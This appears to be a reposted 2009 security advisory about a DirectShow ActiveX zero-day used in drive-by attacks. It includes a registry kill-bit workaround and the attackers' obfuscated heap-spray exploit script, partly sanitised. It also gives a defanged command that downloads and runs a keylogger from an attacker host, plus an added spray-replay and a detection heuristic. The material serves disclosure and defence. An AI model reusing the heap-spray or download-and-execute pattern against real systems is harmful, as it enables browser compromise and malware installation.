Another Microsoft 0-day under active attack!

Source: Internet
Author: User

From: CSIS


CSIS has detected several systematic drive-by attacks exploiting an unpatched vulnerability in Microsoft DirectShow (msvidctl.dll). Over the weekend, thousands of web pages were compromised and malicious script was inserted into them.

The attacks are carried out via compromised web pages and an embedded JavaScript that redirects a visitor from the page to several hostile drive-by servers. CSIS has blacklisted several domains in CSIS sec-DNS to protect against this and similar attacks.

The malicious script inserted into the compromised pages forces the user to visit the following domain (spaces inserted by CSIS):
8oy4t. 8 866.org. From this site "/AA/go.jpg" is fetched, which exploits multiple vulnerabilities, including a previously unknown stack overflow in DirectShow's MPEG2TuneRequest.

The vulnerability is present in several versions of Microsoft Windows, including Windows 2000, 2003 and XP.

The problem can be worked around by setting a kill bit on the affected CLSID:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955ac62-bf2e-4cba-a2b9-a63f772d46cf}]
"Compatibility Flags"=dword:00000400

The above kills the CLSID in question: the value 0x400 is the kill bit, and Internet Explorer will refuse to instantiate the control while it is set. Paste the lines above into Notepad, save the file as .reg, and run it from the desktop to apply the change to the registry (administrator rights are required; on 64-bit Windows the 32-bit Internet Explorer reads the key under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so set it there as well). Note that this is a workaround and not a permanent fix for the problem.

The page attempts to run the following shellcode (an excerpt below, sanitised by CSIS):

var appllaa = '0';
// '%u9090%u9090' is assembled piecewise to dodge simple signatures; unescape()
// turns each %uXXXX into one 16-bit code unit, so this is four x86 NOP bytes
var nndx = '%' + 'u9' + '0' + '9' + '0' + '%u' + '9' + '0' + '9' + appllaa;
// the %u-encoded shellcode, prefixed with the NOPs (excerpt; truncated by CSIS)
var dashell = unescape(nndx + "%u03eb%ueb59%ue805" +
    "%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" /* [snip] */);

// heap spray: build blocks of just under 0x30000 code units of NOPs, each ending in the shellcode
var headersize = 20;                        // allowance for the string object's own header
var omybro = unescape(nndx);                // NOP sled seed
var slackspace = headersize + dashell.length;
while (omybro.length < slackspace)          // double the sled until it covers slackspace
    omybro += omybro;
bzmybr = omybro.substring(0, slackspace);
shuishimvp = omybro.substring(0, omybro.length - slackspace);
while (shuishimvp.length + slackspace < 0x30000)
    shuishimvp = shuishimvp + bzmybr;
memory = new Array();
for (x = 0; x < 300; x++)                   // 300 blocks of NOP sled + shellcode
    memory[x] = shuishimvp + dashell;

// instantiate the vulnerable MSVidCtl control by CLSID
var myobject = document.createElement('object');
divid.appendChild(myobject);                // divid: container element defined elsewhere in the page
myobject.width = '1';
myobject.height = '1';
myobject.data = './logo.gif';               // data file handed to the control
myobject.classid = 'clsid:0955ac62-bf2e-4cba-a2b9-a63f772d46cf';
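To see what the spray above actually produces, the following is an added example (not code from the CSIS advisory) that replays the script's arithmetic with a constructed placeholder payload instead of shellcode and reports the layout of one sprayed block. The function names (buildSpray, describeBlock, sprayReport) are this example's own; the constants 20, 0x30000 and 300 are the ones the script uses. Node is used only to check the string arithmetic; the heap behaviour the spray depends on is that of IE's JScript engine, not V8.

```javascript
// Added example, not from the advisory: replay of the spray arithmetic with a
// constructed placeholder payload. No executable shellcode is included.

// unescape('%u9090%u9090') gives two UTF-16 code units of 0x9090,
// i.e. four consecutive x86 NOP bytes (0x90) in memory.
function nopSeed() {
  return unescape('%u9090%u9090');
}

// Placeholder for the script's "dashell" string: four constructed code units
// that are easy to recognise at the tail of a block.
function placeholderPayload() {
  return unescape('%u4141%u4242%u4343%u4444');
}

// Same construction as the injected script: the sled is doubled until it is at
// least slackspace code units long, one slackspace-sized chunk is set aside
// (bzmybr), and the remainder (shuishimvp) is padded with that chunk until
// body + slackspace reaches blockChars. Each block is body + payload.
function buildSpray(payload, headersize, blockChars, count) {
  var slackspace = headersize + payload.length;
  var sled = nopSeed();
  while (sled.length < slackspace) sled += sled;
  var chunk = sled.substring(0, slackspace);
  var body = sled.substring(0, sled.length - slackspace);
  while (body.length + slackspace < blockChars) body += chunk;
  var blocks = [];
  for (var i = 0; i < count; i++) blocks.push(body + payload);
  return { slackspace: slackspace, bodyChars: body.length, blocks: blocks };
}

// Describe one sprayed string: sizes in code units and bytes, whether everything
// ahead of the payload is 0x9090, and whether the payload sits at the tail.
function describeBlock(block, payload) {
  var sledLen = block.length - payload.length;
  var sledClean = true;
  for (var i = 0; i < sledLen; i++) {
    if (block.charCodeAt(i) !== 0x9090) { sledClean = false; break; }
  }
  return {
    chars: block.length,
    bytes: block.length * 2,
    sledBytes: sledLen * 2,
    payloadAtTail: block.substring(sledLen) === payload,
    sledClean: sledClean
  };
}

// Run the spray with the script's constants and summarise the result.
function sprayReport() {
  var payload = placeholderPayload();
  var spray = buildSpray(payload, 20, 0x30000, 300);
  var info = describeBlock(spray.blocks[0], payload);
  info.blocks = spray.blocks.length;
  info.totalBytes = info.bytes * spray.blocks.length;
  return info;
}

console.log(JSON.stringify(sprayReport(), null, 2));
```

With the four-unit placeholder, slackspace is 24 and each block ends up at 196596 code units (393192 bytes), all NOPs except the last four units; 300 such blocks put roughly 112 MB of sled-plus-payload on the heap. The "headersize" allowance is what keeps each string slightly under 0x30000 units, so that string data plus header fills a round-sized allocation and the payload lands at a predictable offset from the end of every chunk.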

The code spawns a shell with the following call, from which malicious code is downloaded and executed (spaces inserted by CSIS):
C: \ [% Program Files %] \ Internet Explorer \ iw.e.exe "http: // mill/lk.com/wm/svchost.exe

The goal of this attack is to run the file "svchost.exe" on vulnerable systems. The file is a keylogger that records every keystroke on the machine and also enrols the machine in a C&C/bot network. The code fetches several companion components that install a cocktail of malicious code on the compromised system.

Note that we have seen several injection attacks exploiting this vulnerability. Several different landing zones are in use, so we recommend protecting yourself with CSIS sec-DNS.

The exploit code served from the drive-by page gets the following antivirus detection (4 of the 41 engines listed):

Antivirus            Version           Last update   Result
a-squared            4.5.0.18          2009.07.05    -
AhnLab-V3            5.0.0.2           2009.07.05    -
AntiVir              7.9.0.204         2009.07.03    HTML/Shellcode.Gen
Antiy-AVL            2.0.3.1           2009.07.03    -
Authentium           5.1.2.4           2009.07.04    -
Avast                4.8.1335.0        2009.07.04    -
AVG                  8.5.0.386         2009.07.05    -
BitDefender          7.2               2009.07.05    -
CAT-QuickHeal        10.00             2009.07.03    -
ClamAV               0.94.1            2009.07.03    -
Comodo               1538              2009.07.02    -
DrWeb                5.0.0.12182       2009.07.05    -
eSafe                7.0.20            2009.07.02    -
eTrust-Vet           31.6.6596         2009.07.03    -
F-Prot               4.4.56            2009.07.04    -
F-Secure             8.0.14470.0       2009.07.05    -
Fortinet             3.117.0.0         2009.07.03    -
GData                19                2009.07.05    -
Ikarus               T3.1.1.64.0       2009.07.05    -
Jiangmin             11.0.706          2009.07.05    -
K7AntiVirus          7.10.783          2009.07.03    -
Kaspersky            7.0.0.125         2009.07.05    -
McAfee               5666              2009.07.04    -
McAfee+Artemis       5666              2009.07.04    -
McAfee-GW-Edition    6.8.5             2009.07.05    Heuristic.BehavesLike.JS.BufferOverflow
Microsoft            1.4803            2009.07.05    Exploit:JS/ShellCode.gen
NOD32                4217              2009.07.04    -
Norman               6.01.09           2009.07.04    -
nProtect             2009.1.8.0        2009.07.05    -
Panda                10.0.0.14         2009.07.04    -
PCTools              4.4.2.0           2009.07.03    -
Prevx                3.0               2009.07.05    -
Rising               21.36.62.00       2009.07.05    -
Sophos               4.43.0            2009.07.05    -
Sunbelt              3.2.1858.2        2009.07.05    -
Symantec             1.4.4.12          2009.07.05    -
TheHacker            6.3.4.3.20        2009.07.04    -
TrendMicro           8.950.0.1094      2009.07.04    -
VBA32                3.12.10.7         2009.07.05    -
ViRobot              2009.7.3.1818     2009.07.03    -
VirusBuster          4.6.5.0           2009.07.04    JS.BOFExploit.Gen
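The few detections in the table are generic heuristics ("JS/ShellCode.gen", "BehavesLike.JS.BufferOverflow") rather than signatures for this particular page. As an added example, not code from CSIS or from any vendor, the following is a small static heuristic of that kind: it folds split string literals back together (so the piecewise '%u9090' construction becomes visible), then scores a script on the traits of the spray-plus-ActiveX pattern seen above. Both sample scripts are constructed for this example; the flagged CLSID list contains only the CLSID named in the advisory, and the function names are this example's own.

```javascript
// Added example, not from the advisory or any AV product: a static heuristic
// for the spray-plus-ActiveX pattern. Samples below are constructed.

// CLSIDs worth flagging in an <object>; only the one from the advisory is listed.
var FLAGGED_CLSIDS = ['0955ac62-bf2e-4cba-a2b9-a63f772d46cf'];

// Fold "'ab' + 'cd'" into "'abcd'" so %u sequences split across adjacent
// literals (as in the nndx construction) become visible to the checks.
function foldLiterals(src) {
  return src.replace(/'\s*\+\s*'/g, '');
}

function scoreScript(src) {
  var s = foldLiterals(src.toLowerCase());
  var hits = [];

  // unescape() fed many %uXXXX words: 16-bit shellcode encoding
  var uSeq = (s.match(/%u[0-9a-f]{4}/g) || []).length;
  if (/unescape\s*\(/.test(s) && uSeq >= 8)
    hits.push('unescape() fed ' + uSeq + ' %u sequences');
  // 0x9090 NOP sled material
  if (s.indexOf('%u9090') !== -1)
    hits.push('0x9090 NOP sled');
  // while (x.length < n) x += x : the sled-doubling idiom
  if (/while\s*\(\s*(\w+)\.length\s*<[^)]*\)\s*\1\s*\+=\s*\1/.test(s))
    hits.push('string doubling loop');
  // for (i = 0; i < N; i++) with large N, filling a fresh array
  var loop = s.match(/for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;/);
  if (loop && parseInt(loop[1], 10) >= 100 && /new\s+array\s*\(/.test(s))
    hits.push('array filled in a loop of ' + loop[1]);
  // block-size constants such as 0x30000
  if (/0x[0-9a-f]{5,}/.test(s))
    hits.push('large hex size constant');
  // <object> bound to a CLSID on the flag list
  for (var i = 0; i < FLAGGED_CLSIDS.length; i++)
    if (s.indexOf('clsid:' + FLAGGED_CLSIDS[i]) !== -1)
      hits.push('flagged CLSID ' + FLAGGED_CLSIDS[i]);

  return { score: hits.length, hits: hits, verdict: hits.length >= 3 ? 'suspicious' : 'clean' };
}

// Constructed sample mirroring the structure of the injected script; the
// payload words are placeholders, not shellcode.
var SAMPLE_SPRAY = [
  "var appllaa = '0';",
  "var nndx = '%' + 'u9' + '0' + '9' + '0' + '%u' + '9' + '0' + '9' + appllaa;",
  "var dashell = unescape(nndx + '%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848');",
  "var headersize = 20; var omybro = unescape(nndx);",
  "var slackspace = headersize + dashell.length;",
  "while (omybro.length < slackspace) omybro += omybro;",
  "bzmybr = omybro.substring(0, slackspace);",
  "shuishimvp = omybro.substring(0, omybro.length - slackspace);",
  "while (shuishimvp.length + slackspace < 0x30000) shuishimvp = shuishimvp + bzmybr;",
  "memory = new Array(); for (x = 0; x < 300; x++) memory[x] = shuishimvp + dashell;",
  "var myobject = document.createElement('object');",
  "myobject.classid = 'clsid:0955ac62-bf2e-4cba-a2b9-a63f772d46cf';"
].join('\n');

// Constructed benign sample: unescape() and an array loop, but no spray traits.
var SAMPLE_BENIGN = [
  "var q = unescape(location.search.substring(1));",
  "var items = new Array();",
  "for (i = 0; i < 10; i++) items[i] = q + i;",
  "document.getElementById('out').innerHTML = items.join(', ');"
].join('\n');

console.log(JSON.stringify(scoreScript(SAMPLE_SPRAY)));
console.log(JSON.stringify(scoreScript(SAMPLE_BENIGN)));
```

The spray sample trips all six checks while the benign one trips none. A heuristic of this shape is cheap and catches the unobfuscated kit, which is why a few engines in the table fire on it; it is also trivially evaded by renaming, by building the %u words from char codes, or by splitting the loop idioms, which is why most engines in the table do not.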


-- EOF --
